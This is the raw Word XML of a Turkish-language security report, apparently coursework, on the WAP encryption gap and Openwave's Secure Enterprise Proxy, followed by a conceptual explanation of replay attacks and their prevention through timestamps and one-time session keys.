        <w:t>3'te gösterildiği gibi bu yaklaşımlardan biri, WTLS ile şifrelenmiş verilerin, kullanıcının mobil cihazından ve servis sağlayıcısının WAP ağ geçidinden olduğu gibi değişmemesini sağlamaktır. WTLS-SSL şifreleme çevirisi, şifrelenmiş veriler işletme ana bilgisayarının kendi güvenli ağında bulunan ikinci bir WAP ağ geçidi benzeri cihaza ulaşana kadar gerçekleşmez. Böyle bir çözüm geliştiren satıcılardan biri Openwave Systems (Phone.com ve Software.com’un bir kombinasyonu). Openwave, bu ikinci WAP ağ geçidi benzeri aygıta Secure Enterprise Proxy'yi çağırır. Şifreli bir oturum sırasında, servis sağlayıcının WAP ağ geçidi ve işletmenin Secure Enterprise Proxy'si birbirleriyle anlaşır, böylece servis sağlayıcısı, esasen bu Proxy'yi kullanan işletmeye değiştirilen şifreli verileri iletir. Bu çözüm, servis sağlayıcının WAP ağ geçidini kullanır, çünkü mobil kullanıcılar için uygun İnternet erişimi sağlamak için hala gereklidir, ancak WTLS-SSL şifreleme çevirisini orada yapmaz ve dolayısıyla gizli verileri açığa çıkarmaz. Şifre çözme işlemi, işyerinin kendi güvenli ağında, Secure Enterprise Proxy'de veya uygulama sunucusunda geçirilir ve gerçekleştiril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2E6932"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2E6932">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Bununla birlikte, bu yaklaşımın bir dezavantajı, özel mülkiyetidir. Bu yazının yazıldığı sırada, Openwave çözümünün çalışması için üç tarafın bileşenleri yalnızca Openwave'den uygulaması gerekecektir. Kablosuz iletişim servis sağlayıcılarının, Openwave’in en son WAP ağ geçidini kullanmaları gerekir. Aynı şekilde, güvenli uygulamaları barındıran işletmenin, söz konusu ağ geçidi ile şifreleme geçişini görüşmek için Openwave’in Secure Enterprise Proxy’ini kullanması gerekir. Ek olarak, mobil cihazların kendilerinin de Openwave'in en son Web tarayıcısını, en azından Mikro tarayıcı sürüm 5'i kullanmaları gerekir. Dünyadaki WAP özellikli telefonların yaklaşık yüzde 70'i Openwave Micro-browser'ın bazı versiyonlarını kullanıyor olmasına rağmen, bu telefonlar sürüm 3 veya 4'ü kullanıyorlar. Ne yazık ki, bu tarayıcıların çoğu kullanıcı tarafından yükseltilemiyor, bu nedenle çoğu kullanıcının bu çözümü kullanmak için yeni cep telefonları satın alması gerekebilir. Bu çözümün meyve vermesi ve popüler hale gelmesi biraz zaman alabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF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11FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52D27221" wp14:editId="6E712EEE">
            <wp:extent cx="5417128" cy="4053678"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="4099" name="Resim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184" t="16461" r="34337" b="11065"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5423185" cy="4058211"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D511FC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ResimYazs"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Şekil </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:Servis sağlayıcının WAP ağ geçidinden ana makinenin WAP proxy'sine geçiş</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Bunlar, kablosuz Internet aygıtları için uçtan uca şifreleme sağlama konusundaki tek çözüm değildir. Çalışmalardaki diğer yöntemler, uygulama düzeyinde şifreleme uygulamak, cep telefonu SIM kartlarına şifreleme anahtarları ve algoritmalar eklemek ve WAP özelliklerinin bir sonraki revizyonuna daha güçlü şifreleme teknikleri eklemek, belki de “WAP'taki boşluk” u tamamen ortadan kaldırmaktı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BA434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Pr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>onuç</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br/>
        <w:t>Bilgi güvenliği mesleğinde birçok uygulayıcı için iki sağlam öneri:</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Kablosuz güvenlik sorunları ve çözümlerinden haberdar olun.</w:t>
      </w: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Kablosuz aygıtları görmezden gelmeyin.</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BT ve bilgi güvenliği mesleklerindeki çoğu kişi, yeni kablosuz İnternet cihazlarını kısaca kişisel araçlar veya yönetici oyuncakları olarak görür. Birçoğu, kurumsal bilgisayarlarını, sunucularını ve ağlarını koruma sorunları ile uğraşmakla meşguldür, başka bir aygıt sınıfı için endişelenmeyi hayal edemezler. Birçok kurumsal güvenlik politikası, mobil el cihazlarını ve cep telefonlarını güvenceye almaktan hiç söz etmez, ancak bu aynı şirketlerden bazıları zaten kendi dahili e-postalarına erişmek için bu </w:t>
      </w:r>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>cihazları kullanıyor. Duyulan yaygın yanlışlık şudur: bu cihazlar çok küçük olduğu için, böyle küçük bir cihazın yaratacağı zarar ne olabilir?</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Güvenlik departmanları, bilgi varlıklarının anabilgisayar dünyasından dağıtılmış bilgisayar hesaplamaya geçişiyle mücadele etmek zorunda kaldı. Bu evrim sırasında güvenliği nereye uygulayacağınız konusunda birçok kurumsal tutum değişmek zorunda kalmıştır. Abartı olmadan, kurumsal bilgi işlem bir başka önemli göç aşaması geçiriyor. Kurumsal bilgi varlıklarına kablosuz yollardan erişilebilecek kadar fazla değildir, çünkü kablosuz dizüstü bilgisayarlar yıllardır bunu yapıyor; bunun yerine erişim araçları daha ucuz hale gelecek ve böylece hacimsel olarak daha büyük hale gelecektir. 3000 dolarlık bir dizüstü bilgisayar kullanmak yerine, kullanıcılar (veya davetsiz misafir) artık yalnızca 40 dolarlık bir İnternet özellikli cep telefonunu kullanarak her yerden hassas bir kurumsal ağa erişebilir. Zaman içinde, bu mobil cihazlar işlem gücü, bellek, bant genişliği, depolama, kullanım kolaylığı ve son olarak popülerliği artıracaktır. Kurumsal kaynaklardan kaçınılmaz olarak yararlanacak olan bu son maddedi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0"/>
          <w:szCs w:val="20"/>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40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Kaynakça</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r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Kitap:</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1. Blake, Roy,  Wireless Communication Technology , Delmar Thomson Learning, 2001.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2. Harte, Lawrence et al.,  Cellular and PCS: The Big Picture , McGraw-Hill, 1997.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3. Howell, Ric et al.,  Professional WAP,  Wrox Press Ltd.,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4. Muller, Nathan J.,  Desktop Encyclopedia of Telecommunications,   second edition , McGrawHill,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5. Tulloch, Mitch,  Microsoft Encyclopedia of Networking,  Microsoft Press,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6. Van der Heijden, Marcel and Taylor, Marcus,  Understanding WAP: Wireless Applications, Devices, and Services,  Artech House Publishers, 2000.</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eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Makaleler ve Site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D511FC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D511FC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>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1. Saarinen Markku-Juhani,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Attacks Against the WAP WTLS Protocol, University of Jvyskyl,Finland.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lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. Saita, Anne, Case Study: Securing Thin Air, Academia Seeks Better Security Solutions for Handheld Wireless Devices, http://www.infosecuritymag.com, April 2001.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3. Complete WAP Security from Certicom, </w:t>
      </w:r>
      <w:hyperlink r:id="rId89" w:history="1">
        <w:r w:rsidRPr="00D511FC">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>http://www.certicom.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">.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4. Radding, Alan, Crossing the Wireless Security Gap, http://www.computerworld.com, Jan. 1, 2001.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5. Does Java Solve Worldwide WAP Wait?, http://www.unstrung.com, April 9, 2001.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6. DeJesus, Edmund X., “Locking Down the… Wireless Devices Are Flooding the Airwaves with Millions of Bits of Information. Securing Those Transmissions Is the Next Challenge Facing E-Commerce, http://www.infosecuritymag.com, Oct.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7. Izarek, Stephanie, Next-Gen Cell Phones Could Be Targets for Viruses, http://www.foxnews.com, June 1,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sidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Nobel, Carmen, Phone.com Plugs WAP Security Hole,  eWEEK,  September 25,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Pr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">. Schwartz, Ephraim, Two-Zone Wireless Security System Creates a Big Hole in Your Communications, http://www.infoworld.com, Nov. 6, 2000.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Pr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">. Appleby, Timothy P., WAP — The Wireless Application Protocol (White Paper), Global Integrity. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D511F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tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>. Wireless Devices Present New Security Challenges — Growth in Wireless Internet Access Means Handhelds Will Be Targets of More Attacks, CMP Media, Inc., Oct 21, 2000.</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40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00722B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Tekrar Saldırıları</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40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00722B6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722B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tekrar Saldırısı Nedi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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00722B6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22B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bazen playback saldırısı olarak da isimlendirilen tekrar saldırısı, kötü niyetli biri kişinin bir ağ üzerinden geçen geçerli bir veri iletimini ele geçirip  bunu tekrarlayarak gerçekleştirdiği bir siber saldırıdır. </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22B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Orjinal verinin geçerli olması nedeniyle (genellikle yetkili bir kullanıcıdan geldiği için) ağın güvenlik protokolleri saldırıya normal bir veri transferi muamelesi yapar. Orjinal mesaj ele geçirildiği ve bire bir aynı şekilde tekrar iletildiği için, tekrar saldırılarını gerçekleştiren bilgisayar korsanlarının bu mesajların şifresini çözmesi gerekmez.</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77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77D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B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07226397" wp14:editId="4D534689">
            <wp:extent cx="5760720" cy="3119755"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="4100" name="Picture 2" descr="replay attacks exampl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play attacks example ile ilgili gÃ¶rsel sonucu"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId90">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="7258"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3119755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:extLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00802DE6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ResimYazs"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00802DE6">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Şekil </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00802DE6">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:Tekrar Saldırısı Akış Şeması</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hyperlink r:id="rId91" w:history="1">
        <w:r w:rsidRPr="00722B60">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.thesecuritybuddy.com/vulnerabilities/what-is-replay-attack</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId92" w:history="1">
        <w:r w:rsidRPr="00722B60">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00722B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </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77DF4" w:rsidRPr="00722B6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722B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Saldırganlar tekrar saldırısıyla ne yapabili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rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00722B60" w:rsidRDefault="00E77DF4" w:rsidP="00E77D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 xml:space="preserve">Tekrar saldırıları, korunan bir ağ üzerinde depolanan bilgiye görünürde geçerli kimlik bilgileri sunarak erişim sağlamak üzere kullanılabilir. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00722B60" w:rsidRDefault="00E77DF4" w:rsidP="00E77D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Aynı zamanda, finansal kurumları da işlemlerin ikinci kez tekrarlanması  yönünde kandırarak saldırganların kurbanlarının hesaplarından doğrudan paraçekmesine olanak verir. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00722B60" w:rsidRDefault="00E77DF4" w:rsidP="00E77D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bilgisayar korsanları </w:t>
      </w:r>
      <w:r w:rsidRPr="00722B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>şifreli</w:t>
      </w:r>
      <w:r w:rsidRPr="00722B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> mesajların farklı parçalarını bir araya getirir ve ortaya çıkan şifreli metni ağa sunarak kopyala-yapıştır saldırısı olarak bilinen saldırıyı gerçekleştirebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00722B60" w:rsidRDefault="00E77DF4" w:rsidP="00E77D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 xml:space="preserve">Saldırganlar gönderilen </w:t>
      </w:r>
      <w:r w:rsidRPr="00722B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>datayı</w:t>
      </w:r>
      <w:r w:rsidRPr="00722B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> değiştiremez çünkü  ağ bunu reddedecektir ve bu da saldırının eski faaliyetleri tekrarlamadaki etkinliğini sınırlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77D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Ayrıca bu saldırılardan korunmak göreceli olarak daha kolaydır. Veri iletimine saat damgası eklemek kadar basit bir korunma bile basit tekrar saldırı girişimlerine karşı koruma sağla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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC39D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Bir Tekrar Saldırısını Durdurma</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FC39D1" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC39D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Böyle bir saldırıyı önlemek, doğru şifreleme yöntemine sahip olmakla ilgilidir. Şifreli mesajlar içinde "anahtarlar" taşır ve aktarım sonunda kodları çözüldüğünde mesajı açarlar. Bir tekrarlama saldırısında, orijinal mesajı ele geçiren saldırganın anahtarı okuyabileceği veya deşifre edebileceği önemli değildir. Tek yapması gereken, her şeyi - mesaj ve anahtar - birlikte yakalamak ve tekrar göndermek.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FC39D1" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC39D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bu olasılığı önlemek için, hem gönderenin hem de alıcının, yalnızca bir işlem için geçerli olan ve bir daha kullanılamayan bir tür kod olan tamamen rastgele bir oturum anahtarı oluşturması gerekir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FC39D1" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC39D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
